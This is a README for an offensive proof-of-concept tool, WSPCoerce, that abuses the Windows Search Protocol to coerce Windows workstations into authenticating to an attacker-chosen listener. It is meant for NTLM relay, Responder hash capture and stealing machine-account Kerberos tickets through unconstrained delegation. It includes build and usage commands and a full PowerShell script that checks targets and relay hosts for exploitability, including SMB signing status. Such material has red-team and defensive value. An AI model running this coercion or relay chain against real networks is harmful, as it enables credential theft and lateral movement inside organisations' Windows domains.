PoC to coerce authentication from Windows hosts using MS-WSP
WSPCoerce is a tool that interacts with remote hosts over the Windows Search Protocol (MS-WSP, served by the Windows Search Service on the \pipe\MsFteWds named pipe over SMB) and coerces them into authenticating to a host of your choosing: the target's search service connects back to the listener over SMB using the target's machine account.
Use cases:
- Relay the machine-account authentication from the target to another system (only works if SMB signing is not required on the system you relay to)
- Obtain a TGT for the target's machine account (when the listener is a system configured for unconstrained delegation and the target authenticates with Kerberos, i.e. the listener is addressed by hostname or FQDN)
Requirements:
- The tool must run in the context of a domain user (to the author's knowledge, no specific privileges are required on the target system)
- 445/TCP open on the target system (the WSP named pipe is reached over SMB)
- 445/TCP open on the listener system (the target connects back over SMB)
- Windows Search Service (WSearch) running on the target system
Note: the Windows Search Service is NOT enabled by default on Windows Server, so in practice this attack is only effective against Windows workstations.
Build:
c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WSPCoerce.cs
Usage:
WSPCoerce.exe <target> <listener>
Notes:
- The target must be given as a short hostname (NetBIOS name); an IP address or an FQDN does not work
- Use a hostname or FQDN for the listener if you want to receive Kerberos authentication; with an IP address no SPN can be built for the listener and the target falls back to NTLM by default
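The requirements and usage notes above can be verified from the attacking host before running the tool. The following PowerShell pre-flight script is an added example and is not part of WSPCoerce; the hostnames LABWS1 and LABSRV1 are the lab names used in this README, the optional relay target is an assumption, and the Windows Search check works by opening the \pipe\MsFteWds named pipe on the target over SMB, which is exactly the transport the tool itself uses.

```powershell
# Added pre-flight check for WSPCoerce (example code, not part of the tool).
# Assumed lab names: LABWS1 (target workstation), LABSRV1 (listener).
param(
    [string]$Target      = 'LABWS1',   # short hostname only, as the tool requires
    [string]$Listener    = 'LABSRV1',  # hostname/FQDN if you want Kerberos auth
    [string]$RelayTarget = ''          # optional: host you intend to relay NTLM to (needs admin there)
)

$ok = $true

# 1. Target must be a short hostname: the tool accepts neither an FQDN nor an IP address.
if ($Target -match '\.' -or [System.Net.IPAddress]::TryParse($Target, [ref]$null)) {
    Write-Warning "Target '$Target' must be a short hostname (no FQDN, no IP address)."
    $ok = $false
}

# 2. A listener given as an IP address yields NTLM: no SPN (cifs/<host>) can be built for it.
if ([System.Net.IPAddress]::TryParse($Listener, [ref]$null)) {
    Write-Warning "Listener '$Listener' is an IP address; expect NTLM, not Kerberos."
}

# 3. 445/TCP must be reachable on the target (for the WSP pipe) and on the listener
#    (for the coerced SMB connection). Tested from this host as a proxy for target->listener.
foreach ($h in @($Target, $Listener)) {
    $r = Test-NetConnection -ComputerName $h -Port 445 -WarningAction SilentlyContinue
    if (-not $r.TcpTestSucceeded) {
        Write-Warning "445/TCP is closed, filtered, or $h does not resolve."
        $ok = $false
    }
}

# 4. Windows Search Service on the target: MS-WSP is served on \pipe\MsFteWds, so the pipe
#    can only be opened over SMB when WSearch is running. This needs no admin rights on the target.
try {
    $pipe = New-Object System.IO.Pipes.NamedPipeClientStream(
        $Target, 'MsFteWds', [System.IO.Pipes.PipeDirection]::InOut)
    $pipe.Connect(5000)   # throws TimeoutException if the pipe does not exist
    $pipe.Dispose()
    Write-Host "[+] \\$Target\pipe\MsFteWds is reachable: Windows Search Service is running."
} catch {
    Write-Warning "Could not open \\$Target\pipe\MsFteWds ($($_.Exception.GetType().Name)): WSearch is probably not running (it is off by default on Windows Server)."
    $ok = $false
}

# 5. Relay use case: the relay target must not require SMB signing. Querying this through
#    CIM requires local admin on that host, so it is only attempted when a relay target is given.
if ($RelayTarget) {
    try {
        $cfg = Get-SmbServerConfiguration -CimSession $RelayTarget -ErrorAction Stop
        if ($cfg.RequireSecuritySignature) {
            Write-Warning "$RelayTarget requires SMB signing: relaying the coerced auth there will fail."
        } else {
            Write-Host "[+] $RelayTarget does not require SMB signing: NTLM relay over SMB is possible."
        }
    } catch {
        Write-Warning "Could not read SMB server configuration on $RelayTarget (admin rights needed): $($_.Exception.Message)"
    }
}

if ($ok) {
    Write-Host "[+] Pre-flight passed. Run: WSPCoerce.exe $Target $Listener"
} else {
    Write-Host "[-] Pre-flight failed; fix the warnings above before running the tool."
    exit 1
}
```

Run it from a domain-joined host as the same domain user you will run WSPCoerce.exe as; the named-pipe probe in step 4 already authenticates to the target over SMB, so a failure there that is not a TimeoutException usually points at the 445/TCP or credential side rather than at the search service.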
Example 1, NTLM capture:
- Target: LABWS1
- Listener: Kali box running Responder
Search request sent to LABWS1:
NTLMv2 captured on Responder:
Example 2, Kerberos TGT via unconstrained delegation:
- Target: LABWS1
- Listener: LABSRV1 (a system configured for unconstrained delegation)
Search request sent to LABWS1:
Kerberos TGT for the LABWS1 machine account received on the listener (LABSRV1):